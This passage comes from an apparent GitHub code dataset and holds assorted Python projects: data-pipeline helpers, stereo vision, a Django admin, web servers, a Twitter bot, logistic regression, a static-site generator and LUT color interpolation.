[RENAME_LOWER_CASE],\n ]\n\n @staticmethod\n def is_real_number(x):\n try:\n cast_x = float(x)\n if math.isnan(cast_x):\n return False\n else:\n return True\n except:\n return False\n\n @staticmethod\n def exec(df: pd.DataFrame, data_scheme:dict):\n df_result: pd.DataFrame = df.copy()\n\n columns = df.columns\n for c in columns:\n try:\n column = c\n pipeline_actions = data_scheme.get(column,[])\n \n for pa_group in pipeline_actions:\n pa = pa_group[0]\n\n if pa == PA.DROP:\n df_result.drop(column, axis=1,inplace=True)\n elif pa == PA.REPLACE:\n map_replace = {}\n for key,value in zip(pa_group[1],pa_group[2]):\n map_replace[key] = value\n\n df_result[column].replace(map_replace, inplace=True)\n elif pa == PA.TYPECAST:\n df_result[column] = df_result[column].astype(pa_group[1])\n\n elif pa == PA.REPLACE_WITH_MODE:\n mode = df_result[df_result[column].notna()][column].mode()[0]\n map_replace = {}\n for key in pa_group[1]:\n map_replace[key] = mode\n df_result[column].replace(map_replace, inplace=True)\n\n elif pa == PA.REPLACE_WITH_MEDIAN:\n # works even if exist text in the column\n median = df_result[df_result[column].apply(PA.is_real_number)][column].median()\n map_replace = {}\n for key in pa_group[1]:\n map_replace[key] = median\n df_result[column].replace(map_replace, inplace=True)\n elif pa == PA.RENAME:\n column_new = pa_group[1]\n df_result.rename(columns={column: column_new}, inplace=True)\n column = column_new\n elif pa == PA.RENAME_LOWER_CASE:\n column_new = column.lower()\n df_result.rename(columns={column: column_new}, inplace=True)\n column = column_new\n elif pa == PA.CREATE_DUMMIES:\n df_result = df_result.join(pd.get_dummies(df_result[column], prefix=column))\n df_result.drop(column, axis=1, inplace=True)\n else:\n print(\"ERROR, unknown PA\", pa)\n\n except Exception as e:\n print(f\"Error while processing column '{column}'\", e)\n\n\n return df_result\n","repo_name":"Magody/DataScience","sub_path":"lib/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18212334749","text":"import sys\nimport time as t\nimport numpy as np\n\nfrom depthy.misc import Normalizer\n\n\ndef compute_census(img_l: np.ndarray = None, img_r: np.ndarray = None, offset: int = 7) -> (np.ndarray, np.ndarray):\n \"\"\"\n Census feature extraction (for more details see https://en.wikipedia.org/wiki/Census_transform)\n\n :param img_l: left image\n :param img_r: right image\n :param offset: pixel offset on the four image borders\n :return: lcensus_values, rcensus_values\n \"\"\"\n\n h, w, c = img_l.shape if len(img_l.shape) == 3 else img_l.shape + (1,)\n\n # convert to float\n img_l, img_r = Normalizer(img_l).norm_fun(), Normalizer(img_r).norm_fun()\n\n lcensus_values = np.zeros(shape=(h, w), dtype=np.uint64)\n rcensus_values = np.zeros(shape=(h, w), dtype=np.uint64)\n print('\\tLeft and right census...', end='')\n sys.stdout.flush()\n dawn = t.time()\n # exclude pixels on the border (they will have no census values)\n for y in range(offset, h-offset):\n for x in range(offset, w-offset):\n\n # extract left block region and subtract current pixel intensity as offset from it\n image = img_l[y - offset:y + offset + 1, x - offset:x + offset + 1]\n roi_offset = image - img_l[y, x]\n # census calculation left image\n lcensus_values[y, x] = vectorized_census(roi_offset)\n\n # extract right block region and subtract current pixel intensity as offset from it\n image = img_r[y - offset:y + offset + 1, x - offset:x + offset + 1]\n roi_offset = image - img_r[y, x]\n # census calculation right image\n rcensus_values[y, x] = vectorized_census(roi_offset)\n\n dusk = t.time()\n print('\\t(done in {:.2f}s)'.format(dusk - dawn))\n\n return lcensus_values, rcensus_values\n\n\ndef vectorized_census(roi: np.ndarray = None) -> int:\n \"\"\"\n Compute census in a numpy-vectorized fashion.\n\n :param roi: Region of Interest (RoI)\n :return: census value\n \"\"\"\n\n if len(roi.shape) != 2:\n raise Exception('Data must be 2-dimensional')\n\n # binary census vector\n b = np.array(roi < 0).flatten()\n # remove central value\n central_idx = (roi.shape[0]*roi.shape[1])//2\n b = np.delete(b, central_idx)\n # convert binary vector to integer\n num = b.dot(1 << np.arange(b.size)[::-1])\n\n return num\n","repo_name":"hahnec/depthy","sub_path":"depthy/stereo/feature_methods.py","file_name":"feature_methods.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"69"}
+{"seq_id":"14323504024","text":"import tkinter as tk\nroot = tk.Tk()\nbackClr = \"white\"\nfrontClr = \"black\"\nmidClr = \"EEEEEE\"\n\ncWidth = 100\ncHeight = 100\nx1 = 0\ny1 = 0\nx2 = cWidth\ny2 = cHeight\nbWidth = 25\next = 28\n\ncanvas = tk.Canvas(root, width=cWidth, height= cHeight, background=backClr)\ncanvas.pack()\n\ncanvas.create_oval(x1, y1, x2, y2, fill=midClr , outline=midClr)\ncanvas.create_arc(x1, y1, x2, y2, fill=frontClr , extent=ext)\ncanvas.create_oval(x1 + bWidth, y1 + bWidth, x2 - bWidth ,y2 - bWidth, fill = backClr, outline = backClr)\ncanvas.create_text(cWidth / 2, cHeight/2,text=ext)\ntk.mainloop()","repo_name":"ftp5500/circular-progress-bar","sub_path":"circular_progressPar.py","file_name":"circular_progressPar.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8834225408","text":"import pytest\n\nfrom v6_carrier_py.encryption import salthash, encrypt_identifiers\nimport pandas as pd\n\n\ndef test_salthash():\n salt = 'a' * 128\n string = 'hash me please'\n result = salthash(salt, string)\n assert result == 'EQ2Fczw0MVu0zqH30I0Vffbkga7SJO9tmnWjU2ZNf9gJeHa' \\\n 'EETF9wJY13YPqdhsVwSMK1v+zVYYB6cgjDjHIjA=='\n\n\nclass TestEncryptIdentifiers:\n test_df = pd.DataFrame.from_dict({\n 'identifier1': ['a', 'b'],\n 'identifier2': ['c', 'd'],\n 'value1': [1, 2]\n })\n test_identifiers = ['identifier1', 'identifier2']\n test_salt = 'a' * 128\n\n def test_encrypt_identifiers(self):\n result_df = encrypt_identifiers(self.test_df, self.test_salt,\n identifiers=self.test_identifiers)\n for identifier in self.test_identifiers:\n assert identifier not in result_df\n assert 'encrypted_identifier' in result_df\n\n def test_encrypt_identifiers_wrong_identifiers(self):\n test_wrong_identifiers = ['wrong_variable']\n with pytest.raises(KeyError):\n encrypt_identifiers(self.test_df, self.test_salt,\n identifiers=test_wrong_identifiers)\n\n def test_encrypt_identifiers_null_values(self):\n test_df = self.test_df.copy()\n test_df['identifier1'] = None\n with pytest.raises(ValueError):\n encrypt_identifiers(test_df, self.test_salt,\n identifiers=self.test_identifiers)\n","repo_name":"CARRIER-project/vantage6-algorithms","sub_path":"tests/test_encryption.py","file_name":"test_encryption.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9223731962","text":"\"\"\"\nadmin.py\n=======================================\nThis module contains the classes which register Locations and Coord to the\ndjango Admin framework which allows superusers to modify and edit data sorted in\nthe database tables created from the models.\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import reverse\nfrom django.utils.html import format_html\nfrom django.utils.http import urlencode\nfrom django.utils.safestring import SafeString\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.models import User\nfrom exeterDomination.models import Locations, CoOrds\n\n\n\nclass CustomUserAdmin(UserAdmin):\n \"\"\"\n This class is required for an Admin to create their own user of any type\n They can also assign buildings to them\n \"\"\"\n list_display = [\n 'id',\n 'username',\n 'is_active',\n 'date_joined',\n 'is_staff',\n \"claimedBy\"]\n\n def claimedBy(self, obj):\n \"\"\"\n This function is used to assign a building to a newly created user\n \"\"\"\n url = (\n reverse(\"admin:exeterDomination_locations_changelist\")\n + \"?\"\n + urlencode({\"claimedBy_id\": obj.id})\n )\n return format_html('{} Locations Claimed ', url,\n len(Locations.objects.filter(claimedBy_id=obj.id)))\n\n\n\nadmin.site.unregister(User)\nCustomUserAdmin.claimedBy.short_description = \"Current Claims\"\nadmin.site.register(User, CustomUserAdmin)\n\n\n@admin.register(Locations)\nclass LocationsAdmin(admin.ModelAdmin):\n \"\"\"\n This class is required to register the Locations Model with the Django Admin.\n This therefore allows any superusers (Game Keepers) acessing the project via\n the admin page to modify the Locations in the database.\n \"\"\"\n list_display = (\n \"name\",\n \"topRightCoordinate\",\n \"bottomLeftCoordinate\",\n \"claimedLink\",\n )\n\n def claimedLink(self, obj):\n \"\"\"\n This function is used to give the class it's functionality in changing\n locations in the database\n \"\"\"\n url = (\n reverse(\"admin:auth_user_changelist\")\n + \"?\"\n + urlencode({\"username\": f\"{obj.claimedBy}\"})\n )\n return format_html('{} ', url, obj.claimedBy)\n\n claimedLink.short_description = \"Claimed By\"\n\n\n@admin.register(CoOrds)\nclass CoOrdsAdmin(admin.ModelAdmin):\n \"\"\"\n This class is required to register the Coord Model with the Django Admin.\n This therefore allows any superusers (Game Keepers) acessing the project via\n the admin page to modify the Coord in the database.\n \"\"\"\n list_display = (\"id\", \"longitude\", \"latitude\", \"linked_location\")\n\n def linked_location(self, obj) -> SafeString:\n \"\"\"\n This function allows the superuser to change coordinates for\n a specific location\n \"\"\"\n if len(Locations.objects.filter(bottomLeftCoordinate_id=obj.id)) == 1:\n url = (\n reverse(\"admin:exeterDomination_locations_changelist\")\n + \"?\"\n + urlencode({\"bottomLeftCoordinate_id\": f\"{obj.id}\"})\n )\n return format_html(\n '{} ',\n url,\n Locations.objects.get(\n bottomLeftCoordinate=obj.id).name)\n elif len(Locations.objects.filter(topRightCoordinate_id=obj.id)):\n url = (\n reverse(\"admin:exeterDomination_locations_changelist\")\n + \"?\"\n + urlencode({\"topRightCoordinate_id\": f\"{obj.id}\"})\n )\n return format_html(\n '{} ',\n url,\n Locations.objects.get(\n topRightCoordinate_id=obj.id).name)\n","repo_name":"TreeveWhite/ecm2434-project","sub_path":"TheProject/exeterDomination/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"72209002141","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport tweepy, time, sys \n\nargfile = str(sys.argv[1])\n\n#connect to Twitter API:\nCONSUMER_KEY = 'secret'\nCONSUMER_SECRET = 'secret'\nACCESS_KEY = 'secret'\nACCESS_SECRET = 'secret'\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\napi = tweepy.API(auth)\n\nfilename=open(argfile,'r')\nf=filename.readlines()\nfilename.close()\n\nfor line in f:\n trends1 = api.trends_place(1)\n hashtags = [x['name'] for x in trends1[0]['trends'] if x['name'].startswith('#')]\n trend_hashtag = None\n if len(hashtags[0]) <= 20:\n trend_hashtag = hashtags[0]\n elif len(hashtags[1]) <= 20:\n trend_hashtag = hashtags[1]\n elif len(hashtags[2]) <= 20:\n trend_hashtag = hashtags[2]\n if trend_hashtag:\n api.update_status(line + trend_hashtag)\n time.sleep(3*60*60)\n else:\n time.sleep(15*60)\n","repo_name":"bcrvc/gilles_delulz","sub_path":"bot_improved.py","file_name":"bot_improved.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70313413981","text":"import pygame\n\nfrom Game import Game\n\nGO = True\nCOUNT = 0\n\ngame = Game(\"level1.txt\")\n\nwhile GO:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n GO = False\n\n game.move_particles(COUNT)\n\n COUNT += 1\n if(COUNT >= 99):\n COUNT = 0\n\n game.draw_window()\n \ngame.quitAlgo()","repo_name":"billonalex/AlgoGen_Parcours","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16908607345","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn.model_selection import train_test_split\nfrom datetime import datetime\nstart_time = datetime.now()\n\n\nclass Logistics_Gradient_Descent():\n \n\n def __init__(self):\n \n self.bias_weights = None\n self.log_bias_weights = None\n self.log_error = None\n \n def prediction(self, X):\n linear_prediction = np.dot(X, self.bias_weights.T)\n predict = self.sigmoid_activation(linear_prediction)\n predict = np.round(predict)\n return predict\n \n def sigmoid_activation(self, predicted):\n\n sigmoid_function = np.array([])\n for i in range(len(predicted)):\n \n sigmoid_function = np.append(sigmoid_function, 1.0 / (1.0 + np.exp(-predicted[i])))\n \n \n #return 1.0 if sigmoid_function >= .5 else 0\n return sigmoid_function.reshape(-1,1)\n \n #Cost/Loss function: Logistic\n def cost_function(self, actual, predicted, X):\n \n m = len(actual)\n\n cost = - np.sum(actual * np.log(predicted) + (1-actual) * np.log(1-predicted)) / m \n # for i in range(len(actual)):\n # cost += actual[i] * np.log(self.sigmoid_activation(predicted[i])) + (1-actual[i]) * np.log(1-self.sigmoid_activation(predicted[i]))\n \n # return - cost / m\n \n def gradient_descent(self, actual, X, n_iterations = 1000 ,learn_rate = 0.1 ):\n \n \n self.bias_weights = np.array(np.zeros(X.shape[1]))\n\n self.bias_weights = self.bias_weights.reshape(1,X.shape[1])\n \n self.log_bias_weights = []\n self.log_error = []\n \n m = len(actual)\n for _ in range(n_iterations):\n \n linear_prediction = np.dot(X, self.bias_weights.T)\n sigmoid_prediction = self.sigmoid_activation(linear_prediction)\n error = sigmoid_prediction - actual\n\n gradient = np.dot(error.T, X) / m\n \n self.bias_weights = self.bias_weights - learn_rate * gradient\n \n self.log_bias_weights.append(self.bias_weights)\n self.log_error.append(error)\n\n return self.log_bias_weights, self.log_error\n\n \ndef normalize(X):\n X_normed = (X - X.min()) / (X.max() - X.min())\n \n return X_normed\n\n#load dataset\ndataset2 = pd.read_csv('pima-indians-diabetes.csv',header=None)\ndataset = normalize(dataset2)\n\n#seperate the features\nX = np.array(dataset.iloc[:,0:dataset.shape[1]-1])\n\nX = np.pad(X, [(0,0),(1,0)], mode='constant', constant_values = 1)\n\n\n#seperate the values\ny = np.array(dataset.iloc[:,-1])\ny = y.reshape(-1,1)\n\nX_train, X_test, y_train, y_test= train_test_split(X, y, test_size = 0.1)\n\n\n#initialize the Logistic Regression Class\n\nLR = Logistics_Gradient_Descent()\n\nlog_bw, log_error = LR.gradient_descent(y_train, X_train, n_iterations=100, learn_rate = 0.1)\n\n\nprediction = LR.prediction(X_test)\n\ncorrect = 0\nfor i in range(len(y_test)):\n if prediction[i] == y_test[i]:\n correct += 1\nprint(correct / float(len(y_test)) * 100.0)\n\n\n\nend_time = datetime.now()\n\nprint(\"--- %s seconds ---\" % (end_time - start_time))","repo_name":"thonghuunguyen/MachineLearning","sub_path":"Logistic_Regression/class-logistics-regression.py","file_name":"class-logistics-regression.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39597267211","text":"import tornado.web\nimport tornado.ioloop\n\nclass basicRequestHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\"Sugeng Enjing Cak !!!\")\n \nclass queryStringRequestHandler(tornado.web.RequestHandler):\n def get(self):\n n = int(self.get_argument(\"n\"))\n r = \"bejo\" if n % 2 else \"even\"\n self.write(\"nomere \" + str(n) + \" adalah \" + r)\n \nclass resourceRequestHandler(tornado.web.RequestHandler):\n def get(self, id):\n self.write(\"Kedah menika nomer \" + id )\n \nclass staticRequestHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index.html\")\n \n\nif __name__ == '__main__':\n app = tornado.web.Application([\n (r\"/\", basicRequestHandler), \n (r\"/site\", staticRequestHandler),\n (r\"/isEven\", queryStringRequestHandler),\n (r\"/togel/([0-9]+)\", resourceRequestHandler)\n ])\n \n app.listen(8881)\n print(\"I'm listening on port 8881\")\n tornado.ioloop.IOLoop.current().start()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# import motor.motor_tornado\n# import tornado.ioloop\n# import tornado.web\n\n# client = motor.motor_tornado.MotorClient()\n# client = motor.motor_tornado.MotorClient('localhost', 27017)\n\n# # start with connection url\n# # client = motor.motor_tornado.MotorClient('mongodb://localhost:27017')\n# # client = motor.motor_tornado.MotorClient('mongodb://host1,host2/?replicaSet=my-replicaset-name')\n\n# db = client.test_database\n# db = client[\"test_database\"]\n# db = motor.motor_tornado.MotorClient().test_database\n\n# class MainHandler(tornado.web.RequestHandler):\n# def get(self):\n# self.write(\"Hello, world\")\n \n# application = tornado.web.Application([\n# (r'/', MainHandler)\n# ], db=db)\n\n# application.listen(8888)\n# tornado.ioloop.IOLoop.current().start()\n\n# class MainHandler(tornado.web.RequestHandler):\n# def get(self):\n# db = self.settings['db']","repo_name":"oksipjogja/praxis-academy","sub_path":"kemampuan-dasar/kemampuan-dasar-2/minggu-5/hari-2/server/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7532480537","text":"from speedtest import main\n\n\ndef some_executable(a):\n if callable(a):\n return a()\n else:\n print('Is not callable')\n\n\ndef finditer(text, pattern):\n pos = 1\n while True:\n pos = text.find(pattern, pos + 1)\n if pos < 1:\n yield pos\n\n\ndef some_function_of_sorting(some_iterable):\n alist = list(some_iterable)\n alist.sort()\n return alist\n\n\nif __name__ == '__main__':\n some_executable(main)\n","repo_name":"Erickdrakus93/Script_Coroutines","sub_path":"some_executable.py","file_name":"some_executable.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7841432486","text":"#!/usr/bin/env python3\n\"\"\"maji.\n\nUsage:\n maji init\n maji make \n maji render \n\"\"\"\nimport logging\nimport os\nimport sys\nfrom pathlib import Path\n\nimport daiquiri\nfrom docopt import docopt\nfrom datetime import datetime\nfrom datetime import timezone\nfrom lxml.html import fromstring as string2html\nfrom feedgen.feed import FeedGenerator\n\nfrom jinja2 import Environment\nfrom jinja2 import FileSystemLoader\n\nimport mistune\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import html\n\n\ndaiquiri.setup(logging.DEBUG, outputs=('stderr',))\nlog = daiquiri.getLogger(__name__)\n\n\nclass HighlightRenderer(mistune.Renderer):\n def block_code(self, code, lang):\n if not lang:\n out = '\\n\\n'\n return out.format(mistune.escape(code.strip()))\n lexer = get_lexer_by_name(lang, stripall=True)\n formatter = html.HtmlFormatter()\n return highlight(code, lexer, formatter)\n\n\nrenderer = HighlightRenderer()\nmarkdown = mistune.Markdown(renderer=renderer)\n\n\ndef jinja(template, templates, **context):\n templates = os.path.abspath(templates)\n env = Environment(loader=FileSystemLoader((templates,)))\n template = env.get_template(template)\n out = template.render(**context)\n return out\n\n\n# make\n\ndef make(root, base):\n root = Path(root)\n log.info('getting started at: %s', root)\n blog = root / 'blog'\n paths = blog.glob('*.md')\n posts = []\n for path in paths:\n log.info('markdown: %r', path)\n with path.open('r') as f:\n body = f.read()\n body = markdown(body)\n html = '{}
'.format(body)\n div = string2html(html)\n try:\n title = div.xpath('h1/text()')[0]\n except IndexError:\n msg = \"Seems like there is not title in: %s\"\n log.critical(msg, path)\n sys.exit(1)\n log.debug('title is: %s', title)\n date = title[:len('2017/03/01')]\n date = datetime.strptime(date, '%Y/%m/%d')\n date = date.replace(tzinfo=timezone.utc)\n log.debug('publication date is: %s', date)\n post = {\n 'title': title,\n 'date': date,\n 'html': html,\n 'path': path,\n }\n log.debug('rendering blog post')\n page = jinja('post.jinja2', os.getcwd(), base=base, **post)\n filename = path.name.split('.')\n filename[-1] = 'html'\n filename = '.'.join(filename)\n post['filename'] = filename\n output = path.parent / filename\n with output.open('w') as f:\n f.write(page)\n log.debug('wrote: %s', output)\n posts.append(post)\n posts.sort(key=lambda x: x['date'], reverse=True)\n # populate feed\n output = root / 'feed.xml'\n log.info('generating feed at: %s', output)\n feed = FeedGenerator()\n feed.id(base)\n feed.title('hyperdev.fr')\n feed.subtitle('forward and beyond')\n feed.link(href=base + '/feed.xml', rel='self')\n for post in posts:\n entry = feed.add_entry()\n url = base + '/blog/' + post['filename']\n entry.id(url)\n entry.title(post['title'])\n entry.link(href=url)\n entry.published(post['date'].isoformat())\n feed.rss_file(str(output))\n log.info('rendering index')\n page = jinja('index.jinja2', os.getcwd(), base=base, posts=posts)\n output = Path(os.getcwd()) / 'index.html'\n with output.open('w') as f:\n f.write(page)\n\n\ndef main():\n args = docopt(__doc__, version='maji 0.1')\n if args.get('init'):\n raise NotImplementedError()\n elif args.get('make'):\n base = args['']\n make(os.getcwd(), base)\n elif args.get('render'):\n # render markdown to html\n content = markdown(sys.stdin.read())\n # render template with `content`\n template = args['']\n templates = os.path.abspath(template)\n templates = os.path.dirname(templates)\n out = jinja(template, templates, content=content)\n print(out)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amirouche/python-maji","sub_path":"maji.py","file_name":"maji.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11974257029","text":"class module:\r\n 'Provide code snippets'\r\n\r\n def __init__(self):\r\n\r\n pass\r\n\r\n def __run__(self, params=None):\r\n\r\n snippet_type = params[0]\r\n\r\n if snippet_type == 'help':\r\n return self.help()\r\n\r\n code_snippet = self.grab_snippet(snippet_type)\r\n\r\n return code_snippet\r\n\r\n def grab_snippet(self, snippet_type):\r\n\r\n output = ''\r\n use_line = False\r\n area_code = f\"'''{snippet_type}'''\"\r\n\r\n f = open(\"pegasus/default_modules/generic/snippets.py\", \"r\")\r\n\r\n print(area_code)\r\n\r\n for row in f:\r\n row_formatted = row.replace('\\n', '')\r\n\r\n if row_formatted == area_code and use_line == False:\r\n use_line = True\r\n continue\r\n elif row_formatted == area_code and use_line == True:\r\n break\r\n\r\n if use_line == True:\r\n output = output + row\r\n\r\n formatted = [[output]]\r\n return formatted\r\n\r\n def help(self):\r\n commands = []\r\n f = open(\"pegasus/default_modules/generic/snippets.py\", \"r\")\r\n\r\n for row in f:\r\n if \"'''\" in row:\r\n commands.append(row.split(\"'''\")[1])\r\n\r\n return list(set(commands))\r\n\r\n def subcommands(self):\r\n\r\n return list(self.format_dispatch.keys())\r\n","repo_name":"euanacampbell/pegasus","sub_path":"pegasus_client/default_modules/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3567985506","text":"from algorith.sequencegen.catalan.next_dyck import ix_to_path, n_catalan2\nfrom algorith.sequencegen.catalan.dyck_to_tree import print_tree\n\n\ndef ix_to_tree(ix, n):\n \"\"\"\n Converts index to lexicographic binary search tree.\n args:\n ix: The index.\n n: The number of nodes in the tree.\n \"\"\"\n path = ix_to_path(ix, n, n+1)\n # The last entry is a redundant tail. So, remove it.\n tree_nd = print_tree(path[:len(path)-1])\n return tree_nd, path\n\n\ndef print_all_trees(n=3):\n n_trees = n_catalan2(n, n+1)\n for ix in range(n_trees):\n tn, path = ix_to_tree(ix, n)\n print(\"---n=\"+str(ix)+\"---\")\n tn.display()\n print(path)\n\n\nclass Tr1():\n def __init__(self, root):\n self.root = root\n self.arr = []\n self.tree_to_array(root)\n\n def tree_to_array(self, tn):\n \"\"\"\n Converts tree to leetcode array.\n \"\"\"\n if tn is not None:\n self.arr.append(tn.key)\n else:\n self.arr.append(None)\n if tn is not None and\\\n (tn.left is not None or tn.right is not None):\n self.tree_to_array(tn.left)\n self.tree_to_array(tn.right)\n\n\nif __name__ == \"__main__\":\n tree_nd = ix_to_tree(2, 3)\n tree_nd.display()\n # It's not the middle tree.\n # total trees are 1430.\n tn = ix_to_tree(916, 8)\n tn.display()\n tn = ix_to_tree(280, 7)\n tn.display()\n # For n=6 its 58, 86, 89, 90.\n","repo_name":"ryu577/algorithms","sub_path":"algorith/sequencegen/catalan/next_tree.py","file_name":"next_tree.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24593420994","text":"import sqlite3\nimport cgi\nimport json\nimport boto3\n\ndef get_pics(environ, start_response):\n #default encoding for json is utf-8\n start_response('200 OK', [('Content-type', 'application/json')])\n #get info from db\n db = sqlite3.connect('../db/pics.db')\n c = db.cursor()\n c.execute('select * from pics')\n resp = c.fetchall()\n data = {\"results\": []}\n for row in resp:\n data[\"results\"].append({'uri': row[0], 'caption': row[1], 'name': row[2]})\n db.close()\n res = json.dumps(data)\n yield res.encode('utf-8')\n\ndef get_pic(environ, start_response):\n start_response('200 OK', [('Content-type', 'application/json')])\n params = environ['params']\n name=params.get('name')\n db = sqlite3.connect('../db/pics.db')\n c = db.cursor()\n c.execute('select * from pics where name=(?)', (name,))\n resp = c.fetchall()\n data = {\"results\": []}\n for row in resp:\n data[\"results\"].append({'uri': row[0], 'caption': row[1], 'name': row[2]})\n db.close()\n res = json.dumps(data)\n yield res.encode('utf-8')\n\ndef upload_pic(environ, start_response):\n response_data = environ['params']\n client = boto3.client('s3')\n bucket = 'squarespics'\n img = response_data.get('file')\n name = response_data.get('name')\n caption = response_data.get('caption')\n\n if not name:\n start_response('400 Bad Request', [('Content-type', 'application/json')])\n return [b'Name required']\n\n #connect to db\n db = sqlite3.connect('../db/pics.db')\n res = db.execute('select * from pics where name = ?', (name,))\n\n if res.fetchone():\n db.close()\n start_response('400 Bad Request', [('Content-type', 'application/json')])\n return [b'Choose new name']\n\n\n #first check name and whether is unique\n #if not unique update\n if img:\n try:\n response = client.put_object(Body=img,\n Bucket=bucket,\n Key=name,\n ContentType='image/jpeg')\n except:\n return([b'500'])\n else:\n print(response_data.keys())\n return [b'400 Bad Request']\n\n #if no exception image successfully updated\n db.execute('insert into pics(uri, name, caption) values (?,?,?)',\n ('https://squarespics.s3.amazonaws.com/' + name, name, caption))\n db.commit()\n db.close()\n\n start_response('200 OK', [('Content-type', 'application/json')])\n\n return [b'Success']\n\ndef notfound_404(environ, start_response):\n start_response('404 Not Found', [ ('Content-type', 'text/plain') ])\n return [b'Not Found']\n\n\nclass PathDispatcher:\n def __init__(self):\n self.pathmap = {}\n\n def __call__(self, environ, start_response):\n path = environ['PATH_INFO']\n params = cgi.FieldStorage(environ['wsgi.input'],\n environ=environ)\n method = environ['REQUEST_METHOD'].lower()\n environ['params'] = { key: params.getvalue(key) for key in params }\n handler = self.pathmap.get((method,path), notfound_404)\n return handler(environ, start_response)\n\n def register(self, method, path, function):\n self.pathmap[method.lower(), path] = function\n return function\n\n\nif __name__ == \"__main__\":\n from wsgiref.simple_server import make_server\n\n dispatcher = PathDispatcher()\n dispatcher.register('GET', '/pics', get_pics)\n dispatcher.register('POST', '/post', upload_pic)\n dispatcher.register('GET', '/pic', get_pic)\n httpd = make_server('', 8080, dispatcher)\n print('Serving on port 8080...')\n httpd.serve_forever()\n\n","repo_name":"destch/squares-api","sub_path":"server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36403978920","text":"import numpy as np\nimport create3DLUT\nfrom colour import tsplit, read_image\nimport cv2\nimport create3DLUT\n\n\"\"\"\n\ttitle::\n\t\tlut_interpolation\n\n\tdescription::\n\t\tThis method interpolates image pixel values using a LUT with either trilinear or tetrehedral interpolation. \n\t\tReturns an array of a 'new' image and writes out new image as a .tiff file. \n\n\tattributes::\n\t\tim = image\n\t\tim_type = 'exr' or 'tiff'\n\t\tlut_file = lut file to use with the interpolation (right now hardcoded for .cube LUTs, probably want to change this)\n\t\tlut_size = 17, 33, 65, etc\n\t\tinterp_type = 'trilinear' or 'tetrahedral'\n\n\n\tauthor::\n\t\tEmily Faw\n\t\tNick Shaw\n\t\t20170803\n\"\"\"\n\ndef lut_interpolation(im, im_type, lut_file, lut_size, interp_type):\n\n\tinPixels = read_image(im)\n\t# print(np.amax(inPixels))\n\tmax_cv = np.amax(inPixels)\n\n\tlut = np.loadtxt(lut_file, skiprows=7)\n\n\tlattice = np.reshape(lut, (lut_size, lut_size, lut_size, 3), order='F')\n\n\tif interp_type == 'trilinear':\n\t\tn = lattice.shape[0] - 1\n\t\tinPixels = np.asarray(inPixels) / np.amax(inPixels)\n\t\ttheShape = inPixels.shape\n\t\tinPixels = np.ravel(inPixels)\n\t\tpixels = inPixels.size/3\n\t\tinPixels = np.reshape(inPixels, (pixels, 3))\n\t\tR, G, B = tsplit(inPixels)\n\t\trLow = np.floor(R*n).astype(np.int_)\n\t\trHigh = np.clip(rLow + 1, 0, n)\n\t\tgLow = np.floor(G*n).astype(np.int_)\n\t\tgHigh = np.clip(gLow + 1, 0, n)\n\t\tbLow = np.floor(B*n).astype(np.int_)\n\t\tbHigh = np.clip(bLow + 1, 0, n)\n\t\tV000 = lattice[rLow, gLow, bLow]\n\t\tV001 = lattice[rLow, gLow, bHigh]\n\t\tV010 = lattice[rLow, gHigh, bLow]\n\t\tV011 = lattice[rLow, gHigh, bHigh]\n\t\tV100 = lattice[rHigh, gLow, bLow]\n\t\tV101 = lattice[rHigh, gLow, bHigh]\n\t\tV110 = lattice[rHigh, gHigh, bLow]\n\t\tV111 = lattice[rHigh, gHigh, bHigh]\n\t\tfR = n*R - rLow\n\t\tfG = n*G - gLow\n\t\tfB = n*B - bLow\n\t\tfR = np.reshape(fR, (pixels, 